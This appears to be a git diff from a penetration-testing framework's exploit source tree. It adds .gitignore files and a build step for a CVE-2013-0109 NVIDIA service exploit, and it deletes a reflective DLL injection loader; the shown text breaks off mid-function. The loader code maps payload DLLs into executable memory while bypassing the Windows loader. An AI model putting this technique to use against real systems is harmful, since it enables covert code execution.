a/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.vcxproj.filters b/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.vcxproj.filters new file mode 100755 index 0000000000..1874b42275 --- /dev/null +++ b/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.vcxproj.filters @@ -0,0 +1,10 @@ + + + + + + + + + + \ No newline at end of file diff --git a/external/source/exploits/cve-2013-3660/.gitignore b/external/source/exploits/cve-2013-3660/.gitignore new file mode 100644 index 0000000000..c93d5cfc27 --- /dev/null +++ b/external/source/exploits/cve-2013-3660/.gitignore @@ -0,0 +1,152 @@ +## Ignore Visual Studio temporary files, build results, and +## files generated by popular Visual Studio add-ons. + +# User-specific files +*.suo +*.user +*.sln.docstates + +# Build results + +[Dd]ebug/ +[Rr]elease/ +x64/ +build/ +[Bb]in/ +[Oo]bj/ + +# Enable "build/" folder in the NuGet Packages folder since NuGet packages use it for MSBuild targets +!packages/*/build/ + +# MSTest test Results +[Tt]est[Rr]esult*/ +[Bb]uild[Ll]og.* + +*_i.c +*_p.c +*.ilk +*.meta +*.obj +*.pch +*.pdb +*.pgc +*.pgd +*.rsp +*.sbr +*.tlb +*.tli +*.tlh +*.tmp +*.tmp_proj +*.log +*.vspscc +*.vssscc +.builds +*.pidb +*.log +*.scc + +# Visual C++ cache files +ipch/ +*.aps +*.ncb +*.opensdf +*.sdf +*.cachefile + +# Visual Studio profiler +*.psess +*.vsp +*.vspx + +# Guidance Automation Toolkit +*.gpState + +# ReSharper is a .NET coding add-in +_ReSharper*/ +*.[Rr]e[Ss]harper + +# TeamCity is a build add-in +_TeamCity* + +# DotCover is a Code Coverage Tool +*.dotCover + +# NCrunch +*.ncrunch* +.*crunch*.local.xml + +# Installshield output folder +[Ee]xpress/ + +# DocProject is a documentation generator add-in +DocProject/buildhelp/ +DocProject/Help/*.HxT +DocProject/Help/*.HxC +DocProject/Help/*.hhc +DocProject/Help/*.hhk +DocProject/Help/*.hhp +DocProject/Help/Html2 +DocProject/Help/html + +# Click-Once directory +publish/ + +# Publish Web Output +*.Publish.xml +*.pubxml + +# NuGet Packages Directory +## TODO: If you have NuGet Package Restore enabled, uncomment the next line +#packages/ + +# Windows Azure Build Output +csx +*.build.csdef + +# Windows Store app package directory +AppPackages/ + +# Others +sql/ +*.Cache +ClientBin/ +[Ss]tyle[Cc]op.* +~$* +*~ +*.dbmdl +*.[Pp]ublish.xml +*.pfx +*.publishsettings + +# RIA/Silverlight projects +Generated_Code/ + +# Backup & report files from converting an old project file to a newer +# Visual Studio version. Backup files are not needed, because we have git ;-) +_UpgradeReport_Files/ +Backup*/ +UpgradeLog*.XML +UpgradeLog*.htm + +# SQL Server files +App_Data/*.mdf +App_Data/*.ldf + +# ========================= +# Windows detritus +# ========================= + +# Windows image file caches +Thumbs.db +ehthumbs.db + +# Folder config file +Desktop.ini + +# Recycle Bin used on file shares +$RECYCLE.BIN/ + +# Mac crap +.DS_Store + diff --git a/external/source/exploits/make.bat b/external/source/exploits/make.bat index 808969ad80..6981f1f155 100755 --- a/external/source/exploits/make.bat +++ b/external/source/exploits/make.bat @@ -26,6 +26,13 @@ PUSHD CVE-2010-0232 msbuild.exe make.msbuild /target:%PLAT% POPD +IF "%ERRORLEVEL%"=="0" ( + ECHO "Building CVE-2013-0109 (nvidia_nvsvc)" + PUSHD CVE-2013-0109 + msbuild.exe make.msbuild /target:%PLAT% + POPD +) + IF "%ERRORLEVEL%"=="0" ( ECHO "Building CVE-2013-3660 (ppr_flatten_rec)" PUSHD CVE-2013-3660 diff --git a/external/source/vncdll/.gitignore b/external/source/vncdll/.gitignore new file mode 100644 index 0000000000..c93d5cfc27 --- /dev/null +++ b/external/source/vncdll/.gitignore @@ -0,0 +1,152 @@ +## Ignore Visual Studio temporary files, build results, and +## files generated by popular Visual Studio add-ons. + +# User-specific files +*.suo +*.user +*.sln.docstates + +# Build results + +[Dd]ebug/ +[Rr]elease/ +x64/ +build/ +[Bb]in/ +[Oo]bj/ + +# Enable "build/" folder in the NuGet Packages folder since NuGet packages use it for MSBuild targets +!packages/*/build/ + +# MSTest test Results +[Tt]est[Rr]esult*/ +[Bb]uild[Ll]og.* + +*_i.c +*_p.c +*.ilk +*.meta +*.obj +*.pch +*.pdb +*.pgc +*.pgd +*.rsp +*.sbr +*.tlb +*.tli +*.tlh +*.tmp +*.tmp_proj +*.log +*.vspscc +*.vssscc +.builds +*.pidb +*.log +*.scc + +# Visual C++ cache files +ipch/ +*.aps +*.ncb +*.opensdf +*.sdf +*.cachefile + +# Visual Studio profiler +*.psess +*.vsp +*.vspx + +# Guidance Automation Toolkit +*.gpState + +# ReSharper is a .NET coding add-in +_ReSharper*/ +*.[Rr]e[Ss]harper + +# TeamCity is a build add-in +_TeamCity* + +# DotCover is a Code Coverage Tool +*.dotCover + +# NCrunch +*.ncrunch* +.*crunch*.local.xml + +# Installshield output folder +[Ee]xpress/ + +# DocProject is a documentation generator add-in +DocProject/buildhelp/ +DocProject/Help/*.HxT +DocProject/Help/*.HxC +DocProject/Help/*.hhc +DocProject/Help/*.hhk +DocProject/Help/*.hhp +DocProject/Help/Html2 +DocProject/Help/html + +# Click-Once directory +publish/ + +# Publish Web Output +*.Publish.xml +*.pubxml + +# NuGet Packages Directory +## TODO: If you have NuGet Package Restore enabled, uncomment the next line +#packages/ + +# Windows Azure Build Output +csx +*.build.csdef + +# Windows Store app package directory +AppPackages/ + +# Others +sql/ +*.Cache +ClientBin/ +[Ss]tyle[Cc]op.* +~$* +*~ +*.dbmdl +*.[Pp]ublish.xml +*.pfx +*.publishsettings + +# RIA/Silverlight projects +Generated_Code/ + +# Backup & report files from converting an old project file to a newer +# Visual Studio version. Backup files are not needed, because we have git ;-) +_UpgradeReport_Files/ +Backup*/ +UpgradeLog*.XML +UpgradeLog*.htm + +# SQL Server files +App_Data/*.mdf +App_Data/*.ldf + +# ========================= +# Windows detritus +# ========================= + +# Windows image file caches +Thumbs.db +ehthumbs.db + +# Folder config file +Desktop.ini + +# Recycle Bin used on file shares +$RECYCLE.BIN/ + +# Mac crap +.DS_Store + diff --git a/external/source/vncdll/loader/LoadLibraryR.c b/external/source/vncdll/loader/LoadLibraryR.c deleted file mode 100644 index 8960cfe16f..0000000000 --- a/external/source/vncdll/loader/LoadLibraryR.c +++ /dev/null @@ -1,131 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#include "LoadLibraryR.h" -//===============================================================================================// -DWORD Rva2Offset( DWORD dwRva, UINT_PTR uiBaseAddress ) -{ - WORD wIndex = 0; - PIMAGE_SECTION_HEADER pSectionHeader = NULL; - PIMAGE_NT_HEADERS pNtHeaders = NULL; - - pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew); - - pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader); - - if( dwRva < pSectionHeader[0].PointerToRawData ) - return dwRva; - - for( wIndex=0 ; wIndex < pNtHeaders->FileHeader.NumberOfSections ; wIndex++ ) - { - if( dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData) ) - return ( dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData ); - } - - return 0; -} -//===============================================================================================// -DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer ) -{ - UINT_PTR uiBaseAddress = 0; - UINT_PTR uiExportDir = 0; - UINT_PTR uiNameArray = 0; - UINT_PTR uiAddressArray = 0; - UINT_PTR uiNameOrdinals = 0; - DWORD dwCounter = 0; -#ifdef _WIN64 - DWORD dwMeterpreterArch = 2; -#else - DWORD dwMeterpreterArch = 1; -#endif - - uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer; - - // get the File Offset of the modules NT Header - uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew; - - // currenlty we can only process a PE file which is the same type as the one this fuction has - // been compiled as, due to various offset in the PE structures being defined at compile time. - if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x010B ) // PE32 - { - if( dwMeterpreterArch != 1 ) - return 0; - } - else if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x020B ) // PE64 - { - if( dwMeterpreterArch != 2 ) - return 0; - } - else - { - return 0; - } - - // uiNameArray = the address of the modules export directory entry - uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the File Offset of the export directory - uiExportDir = uiBaseAddress + Rva2Offset( ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress ); - - // get the File Offset for the array of name pointers - uiNameArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames, uiBaseAddress ); - - // get the File Offset for the array of addresses - uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress ); - - // get the File Offset for the array of name ordinals - uiNameOrdinals = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals, uiBaseAddress ); - - // get a counter for the number of exported functions... - dwCounter = ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->NumberOfNames; - - // loop through all the exported functions to find the ReflectiveLoader - while( dwCounter-- ) - { - char * cpExportedFunctionName = (char *)(uiBaseAddress + Rva2Offset( DEREF_32( uiNameArray ), uiBaseAddress )); - - if( strstr( cpExportedFunctionName, "ReflectiveLoader" ) != NULL ) - { - // get the File Offset for the array of addresses - uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress ); - - // use the functions name ordinal as an index into the array of name pointers - uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) ); - - // return the File Offset to the ReflectiveLoader() functions code... - return Rva2Offset( DEREF_32( uiAddressArray ), uiBaseAddress ); - } - // get the next exported function name - uiNameArray += sizeof(DWORD); - - // get the next exported function name ordinal - uiNameOrdinals += sizeof(WORD); - } - - return 0; -} -//===============================================================================================// diff --git a/external/source/vncdll/loader/LoadLibraryR.h b/external/source/vncdll/loader/LoadLibraryR.h deleted file mode 100644 index 5c1e65075f..0000000000 --- a/external/source/vncdll/loader/LoadLibraryR.h +++ /dev/null @@ -1,37 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#ifndef _VNCDLL_LOADER_LOADLIBRARYR_H -#define _VNCDLL_LOADER_LOADLIBRARYR_H -//===============================================================================================// -#include "ReflectiveDLLInjection.h" - -DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer ); - -//===============================================================================================// -#endif -//===============================================================================================// diff --git a/external/source/vncdll/loader/ReflectiveDLLInjection.h b/external/source/vncdll/loader/ReflectiveDLLInjection.h deleted file mode 100644 index d41b2ac323..0000000000 --- a/external/source/vncdll/loader/ReflectiveDLLInjection.h +++ /dev/null @@ -1,53 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#ifndef _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H -#define _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H -//===============================================================================================// -#define WIN32_LEAN_AND_MEAN -#include - -// we declare some common stuff in here... - -#define DLL_METASPLOIT_ATTACH 4 -#define DLL_METASPLOIT_DETACH 5 -#define DLL_QUERY_HMODULE 6 - -#define DEREF( name )*(UINT_PTR *)(name) -#define DEREF_64( name )*(DWORD64 *)(name) -#define DEREF_32( name )*(DWORD *)(name) -#define DEREF_16( name )*(WORD *)(name) -#define DEREF_8( name )*(BYTE *)(name) - -typedef DWORD (WINAPI * REFLECTIVELOADER)( VOID ); -typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID ); - -#define DLLEXPORT __declspec( dllexport ) - -//===============================================================================================// -#endif -//===============================================================================================// diff --git a/external/source/vncdll/loader/ReflectiveLoader.c b/external/source/vncdll/loader/ReflectiveLoader.c deleted file mode 100644 index fe667a830d..0000000000 --- a/external/source/vncdll/loader/ReflectiveLoader.c +++ /dev/null @@ -1,451 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#include "ReflectiveLoader.h" -//===============================================================================================// -// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value -HINSTANCE hAppInstance = NULL; -//===============================================================================================// -#ifdef _WIN64 -#pragma intrinsic( _ReturnAddress ) -UINT_PTR eip( VOID ) { return (UINT_PTR)_ReturnAddress(); } -#endif -//===============================================================================================// - -// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN, -// otherwise the DllMain at the end of this file will be used. - -// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR, -// otherwise it is assumed you are calling the ReflectiveLoader via a stub. - -// This is our position independent reflective DLL loader/injector -#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR -DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( LPVOID lpParameter ) -#else -DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID ) -#endif -{ - // the functions we need - LOADLIBRARYA pLoadLibraryA; - GETPROCADDRESS pGetProcAddress; - VIRTUALALLOC pVirtualAlloc; - USHORT usCounter; - - // the initial location of this image in memory - UINT_PTR uiLibraryAddress; - // the kernels base address and later this images newly loaded base address - UINT_PTR uiBaseAddress; - - // variables for processing the kernels export table - UINT_PTR uiAddressArray; - UINT_PTR uiNameArray; - UINT_PTR uiExportDir; - UINT_PTR uiNameOrdinals; - DWORD dwHashValue; - - // variables for loading this image - UINT_PTR uiHeaderValue; - UINT_PTR uiValueA; - UINT_PTR uiValueB; - UINT_PTR uiValueC; - UINT_PTR uiValueD; - - // STEP 0: calculate our images current base address - - // we will start searching backwards from our current EIP -#ifdef _WIN64 - uiLibraryAddress = eip(); -#else - __asm call geteip - __asm geteip: pop uiLibraryAddress -#endif - - // loop through memory backwards searching for our images base address - // we dont need SEH style search as we shouldnt generate any access violations with this - while( TRUE ) - { - if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE ) - { - uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; - // some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'), - // we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems. - if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 ) - { - uiHeaderValue += uiLibraryAddress; - // break if we have found a valid MZ/PE header - if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE ) - break; - } - } - uiLibraryAddress--; - } - - // STEP 1: process the kernels exports for the functions our loader needs... - - // get the Process Enviroment Block -#ifdef _WIN64 - uiBaseAddress = __readgsqword( 0x60 ); -#else - uiBaseAddress = __readfsdword( 0x30 ); -#endif - - // get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx - uiBaseAddress = (UINT_PTR)((_PPEB)uiBaseAddress)->pLdr; - - // get the first entry of the InMemoryOrder module list - uiValueA = (UINT_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink; - while( uiValueA ) - { - // get pointer to current modules name (unicode string) - uiValueB = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer; - // set bCounter to the length for the loop - usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length; - // clear uiValueC which will store the hash of the module name - uiValueC = 0; - // compute the hash of the module name... - do - { - uiValueC = ror( (DWORD)uiValueC ); - // normalize to uppercase if the madule name is in lowercase - if( *((BYTE *)uiValueB) >= 'a' ) - uiValueC += *((BYTE *)uiValueB) - 0x20; - else - uiValueC += *((BYTE *)uiValueB); - uiValueB++; - } while( --usCounter ); - // compare the hash with that of kernel32.dll - if( (DWORD)uiValueC == KERNEL32DLL_HASH ) - { - // get this modules base address - uiBaseAddress = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase; - break; - } - // get the next entry - uiValueA = DEREF( uiValueA ); - } - - // get the VA of the modules NT Header - uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew; - - // uiNameArray = the address of the modules export directory entry - uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the VA of the export directory - uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress ); - - // get the VA for the array of name pointers - uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames ); - - // get the VA for the array of name ordinals - uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals ); - - usCounter = 3; - - // loop while we still have imports to find - while( usCounter > 0 ) - { - // compute the hash values for this function name - dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) ); - - // if we have found a function we want we get its virtual address - if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH ) - { - // get the VA for the array of addresses - uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions ); - - // use this functions name ordinal as an index into the array of name pointers - uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) ); - - // store this functions VA - if( dwHashValue == LOADLIBRARYA_HASH ) - pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - else if( dwHashValue == GETPROCADDRESS_HASH ) - pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - else if( dwHashValue == VIRTUALALLOC_HASH ) - pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - - // decrement our counter - usCounter--; - } - - // get the next exported function name - uiNameArray += sizeof(DWORD); - - // get the next exported function name ordinal - uiNameOrdinals += sizeof(WORD); - } - - // STEP 2: load our image into a new permanent location in memory... - - // get the VA of the NT Header for the PE to be loaded - uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; - - // allocate all the memory for the DLL to be loaded into. we can load at any address because we will - // relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems. - uiBaseAddress = (UINT_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE ); - - // we must now copy over the headers - uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders; - uiValueB = uiLibraryAddress; - uiValueC = uiBaseAddress; - __movsb( (PBYTE)uiValueC, (PBYTE)uiValueB, uiValueA ); - - // STEP 3: load in all of our sections... - - // uiValueA = the VA of the first section - uiValueA = ( (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader ); - - // itterate through all sections, loading them into memory. - while( ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections-- ) - { - // uiValueB is the VA for this section - uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress ); - - // uiValueC if the VA for this sections data - uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData ); - - // copy the section over - uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData; - __movsb( (PBYTE)uiValueB, (PBYTE)uiValueC, uiValueD ); - - // get the VA of the next section - uiValueA += sizeof( IMAGE_SECTION_HEADER ); - } - - // STEP 4: process our images import table... - - // uiValueB = the address of the import directory - uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ]; - - // we assume their is an import table to process - // uiValueC is the first entry in the import table - uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress ); - - // itterate through all imports - while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) - { - // use LoadLibraryA to load the imported module into memory - uiLibraryAddress = (UINT_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) ); - - // uiValueD = VA of the OriginalFirstThunk - uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk ); - - // uiValueA = VA of the IAT (via first thunk not origionalfirstthunk) - uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk ); - - // itterate through all imported functions, importing by ordinal if no name present - while( DEREF(uiValueA) ) - { - // sanity check uiValueD as some compilers only import by FirstThunk - if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG ) - { - // get the VA of the modules NT Header - uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; - - // uiNameArray = the address of the modules export directory entry - uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the VA of the export directory - uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress ); - - // get the VA for the array of addresses - uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions ); - - // use the import ordinal (- export ordinal base) as an index into the array of addresses - uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) ); - - // patch in the address for this imported function - DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) ); - } - else - { - // get the VA of this functions import by name struct - uiValueB = ( uiBaseAddress + DEREF(uiValueA) ); - - // use GetProcAddress and patch in the address for this imported function - DEREF(uiValueA) = (UINT_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name ); - } - // get the next imported function - uiValueA += sizeof( UINT_PTR ); - if( uiValueD ) - uiValueD += sizeof( UINT_PTR ); - } - - // get the next import - uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR ); - } - - // STEP 5: process all of our images relocations... - - // calculate the base address delta and perform relocations 